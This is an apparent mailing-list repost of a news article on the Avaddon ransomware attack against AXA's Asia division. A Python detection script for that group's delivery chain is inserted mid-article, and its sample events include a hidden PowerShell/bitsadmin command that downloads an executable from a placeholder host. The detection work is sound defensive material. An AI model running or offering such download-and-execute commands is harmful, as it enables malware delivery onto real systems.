[BreachExchange] After dropping support for ransom payments, AXA struck by ransomware in Asia

Destry Winant destry at riskbasedsecurity.com
Tue May 18 10:23:12 EDT 2021


https://siliconangle.com/2021/05/16/dropping-support-ransom-payments-axa-struck-ransomware-asia/

French multinational insurance firm AXA S.A. has been struck by a
ransomware attack after the company announced May 9 that it would stop
covering ransomware payments.

Reuters reported the company said today that one of its Asia Assistance
divisions had been targeted and that information technology services were
affected in Thailand, Malaysia, Hong Kong and the Philippines. “As a
result, certain data processed by Inter Partners Asia (IPA) in Thailand has
been accessed,” AXA noted.

According to Hackread, the Avaddon ransomware group was behind the attack
and is claiming responsibility on its dark web site. The group claims to
have stolen 3 terabytes of data, including a long list of information: ID
cards, passport copies, customer claims, reserved agreements, denied
reimbursements, payments to customers, contracts and reports, customer IDs
and scanned bank account documents, hospital and doctor reserved material
(private investigation for fraud) and customer medical reports including
HIV, hepatitis, STD and other illness reports.

Avaddon provided copies of two passports as evidence, one Thai and the
other from the U.K.

The ransom being demanded was not disclosed. The ransomware group said AXA
has 240 hours to communicate and cooperate, otherwise it will leak valuable
company documents.

The attack by Avaddon comes just under a week since both the U.S. Federal
Bureau of Investigation and the Australian Cyber Security Centre issued
warnings that an Avaddon campaign was targeting organizations worldwide.
The FBI said that Avaddon ransomware affiliates are trying to breach the
networks of manufacturing, healthcare and other private sector
organizations, while the ACSC said that the targets included government,
finance, law enforcement, energy, information technology and health.

“In addition to encryption of data, victims are threatened with the
publication of stolen data, as well as Distributed Denial of Service
against their network,” the ACSC added.

Avaddon dates to around June last year and was first detailed in July by
Trend Micro Inc. Avaddon ransomware attacks are typically propagated
through emails with a JavaScript attachment. Once the attachment is
downloaded and run, it uses a PowerShell command and the BITSAdmin
command-line tool to download and run the ransomware payload.
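The delivery chain just described (script host running the JavaScript attachment, then PowerShell, then BITSAdmin fetching the payload) is what a defender would hunt for in process-creation telemetry. The following is an added detection example, not code from the article or from any vendor; the events, PIDs, paths and the `example.invalid` URL are constructed samples, and the function name `find_chains` is hypothetical.

```python
"""Flag bitsadmin downloads whose ancestry includes PowerShell launched by a
Windows script host, the chain attributed to Avaddon delivery above."""
import re

# Constructed process-creation events: (pid, parent_pid, image, command line)
SAMPLE_EVENTS = [
    (400, 300, "explorer.exe", "explorer.exe"),
    (410, 400, "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\invoice.js"'),
    (420, 410, "powershell.exe",
     "powershell.exe -w hidden -c bitsadmin /transfer job /download "
     "/priority high http://example.invalid/a.exe C:\\Users\\u\\Temp\\a.exe"),
    (430, 420, "bitsadmin.exe",
     "bitsadmin /transfer job /download /priority high "
     "http://example.invalid/a.exe C:\\Users\\u\\Temp\\a.exe"),
    # Benign noise: an admin listing BITS jobs from an interactive shell
    (440, 400, "powershell.exe", "powershell.exe -c Get-Date"),
    (450, 440, "bitsadmin.exe", "bitsadmin /list"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# bitsadmin /transfer with a remote URL: the download step of the chain
TRANSFER_RE = re.compile(r"/transfer\b.*\bhttps?://", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def find_chains(events, max_depth=10):
    """Return one finding per bitsadmin download whose parent chain contains
    powershell.exe and, above it, a script host (wscript/cscript)."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, image, cmd in events:
        if image.lower() != "bitsadmin.exe" or not TRANSFER_RE.search(cmd):
            continue
        # Walk up the parent chain, collecting image names (root last).
        ancestry = []
        cur = by_pid.get(ppid)
        while cur is not None and len(ancestry) < max_depth:
            ancestry.append(cur[2].lower())
            cur = by_pid.get(cur[1])
        if "powershell.exe" in ancestry and SCRIPT_HOSTS & set(ancestry):
            findings.append({
                "pid": pid,
                "url": URL_RE.search(cmd).group(0),
                "chain": [*reversed(ancestry), image.lower()],
            })
    return findings


if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f)
```

Against the constructed events only the `wscript.exe -> powershell.exe -> bitsadmin.exe` download is reported; the interactive `bitsadmin /list` is ignored because it has no `/transfer` and no script-host ancestor.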

At this point, users have their wallpaper changed to an image that states
that “all your files have been encrypted” and are told to read a ransom
note. The note provides instructions on how the affected users can recover
their encrypted files.